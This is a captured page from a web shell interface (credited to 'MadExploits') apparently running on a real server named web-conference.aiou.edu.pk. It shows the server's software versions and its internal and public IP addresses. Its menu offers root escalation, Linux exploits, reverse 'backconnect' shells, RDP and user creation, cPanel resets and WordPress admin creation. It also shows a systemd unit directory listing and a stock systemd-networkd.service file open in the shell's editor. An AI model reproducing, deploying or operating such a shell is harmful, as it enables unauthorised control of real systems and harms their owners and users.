Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.139.235.59
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
etc /
systemd /
system /
multi-user.target.wants /
[ HOME SHELL ]
Name
Size
Permission
Action
ModemManager.service
480
B
-rw-r--r--
apache2.service
395
B
-rw-r--r--
atd.service
347
B
-rw-r--r--
console-setup.service
312
B
-rw-r--r--
containerd.service
1.39
KB
-rw-r--r--
cron.service
316
B
-rw-r--r--
dmesg.service
358
B
-rw-r--r--
docker.service
1.67
KB
-rw-r--r--
grub-common.service
583
B
-rw-r--r--
grub-initrd-fallback.service
408
B
-rw-r--r--
irqbalance.service
454
B
-rw-r--r--
lxd-agent-9p.service
489
B
-rw-r--r--
lxd-agent.service
498
B
-rw-r--r--
mysql.service
529
B
-rw-r--r--
networkd-dispatcher.service
258
B
-rw-r--r--
nfs-client.target
272
B
-rw-r--r--
ondemand.service
362
B
-rw-r--r--
open-vm-tools.service
489
B
-rw-r--r--
pollinate.service
404
B
-rw-r--r--
remote-fs.target
522
B
-rw-r--r--
rpcbind.service
626
B
-rw-r--r--
rsync.service
255
B
-rw-r--r--
rsyslog.service
435
B
-rw-r--r--
secureboot-db.service
604
B
-rw-r--r--
snap-core20-2318.mount
326
B
-rw-r--r--
snap-core20-2434.mount
326
B
-rw-r--r--
snap-lxd-24061.mount
320
B
-rw-r--r--
snap-lxd-29619.mount
320
B
-rw-r--r--
snap-snapd-23258.mount
326
B
-rw-r--r--
snap-snapd-23545.mount
326
B
-rw-r--r--
snap.lxd.activate.service
467
B
-rw-r--r--
snapd.apparmor.service
1.27
KB
-rw-r--r--
snapd.autoimport.service
487
B
-rw-r--r--
snapd.core-fixup.service
369
B
-rw-r--r--
snapd.recovery-chooser-trigger...
550
B
-rw-r--r--
snapd.seeded.service
308
B
-rw-r--r--
snapd.service
750
B
-rw-r--r--
ssh.service
538
B
-rw-r--r--
systemd-networkd.service
1.95
KB
-rw-r--r--
systemd-resolved.service
1.69
KB
-rw-r--r--
thermald.service
290
B
-rw-r--r--
ua-reboot-cmds.service
830
B
-rw-r--r--
ubuntu-advantage.service
1.53
KB
-rw-r--r--
ufw.service
266
B
-rw-r--r--
unattended-upgrades.service
377
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : systemd-networkd.service
# SPDX-License-Identifier: LGPL-2.1+ # # This file is part of systemd. # # systemd is free software; you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation; either version 2.1 of the License, or # (at your option) any later version. [Unit] Description=Network Service Documentation=man:systemd-networkd.service(8) ConditionCapability=CAP_NET_ADMIN DefaultDependencies=no # systemd-udevd.service can be dropped once tuntap is moved to netlink After=systemd-udevd.service network-pre.target systemd-sysusers.service systemd-sysctl.service Before=network.target multi-user.target shutdown.target Conflicts=shutdown.target Wants=network.target [Service] AmbientCapabilities=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW CapabilityBoundingSet=CAP_NET_ADMIN CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_RAW DeviceAllow=char-* rw ExecStart=!!/lib/systemd/systemd-networkd LockPersonality=yes MemoryDenyWriteExecute=yes NoNewPrivileges=yes ProtectControlGroups=yes ProtectHome=yes ProtectKernelModules=yes ProtectKernelLogs=yes ProtectSystem=strict Restart=on-failure RestartSec=0 RestrictAddressFamilies=AF_UNIX AF_NETLINK AF_INET AF_INET6 AF_PACKET AF_ALG RestrictNamespaces=yes RestrictRealtime=yes RestrictSUIDSGID=yes RuntimeDirectory=systemd/netif RuntimeDirectoryPreserve=yes SystemCallArchitectures=native SystemCallErrorNumber=EPERM SystemCallFilter=@system-service Type=notify RestartKillSignal=SIGUSR2 User=systemd-network WatchdogSec=3min [Install] WantedBy=multi-user.target Also=systemd-networkd.socket Alias=dbus-org.freedesktop.network1.service # We want to enable systemd-networkd-wait-online.service whenever this service # is enabled. systemd-networkd-wait-online.service has # WantedBy=network-online.target, so enabling it only has an effect if # network-online.target itself is enabled or pulled in by some other unit. Also=systemd-networkd-wait-online.service
Close